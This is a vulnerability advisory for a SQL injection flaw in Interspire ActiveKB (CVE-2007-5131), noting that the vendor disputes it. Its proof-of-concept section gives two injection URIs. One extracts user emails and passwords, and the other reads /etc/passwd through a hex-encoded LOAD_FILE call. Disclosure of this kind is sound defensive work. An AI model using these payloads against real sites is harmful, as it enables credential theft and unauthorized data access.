ActiveKB Index.PHP SQL Injection Vulnerability
BID:25820
Info
ActiveKB Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 25820 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5131 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 26 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Luna-Tic and XTErner are credited with the discovery of this vulnerability. |
| Vulnerable: |
Interspire ActiveKB NX 2 Interspire ActiveKB NX 2.6 |
| Not Vulnerable: | |
Discussion
ActiveKB Index.PHP SQL Injection Vulnerability
ActiveKB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
UPDATE (December 11, 2007): The vendor refutes this issue because they cannot replicate it.
ActiveKB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
UPDATE (December 11, 2007): The vendor refutes this issue because they cannot replicate it.
Exploit / POC
ActiveKB Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user-- https://www.example.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user-- https://www.example.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*
Solution / Fix
ActiveKB Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ActiveKB Index.PHP SQL Injection Vulnerability
References:
References:
- ActiveKB Homepage (Interspire)
- Interspire Homepage (Interspire)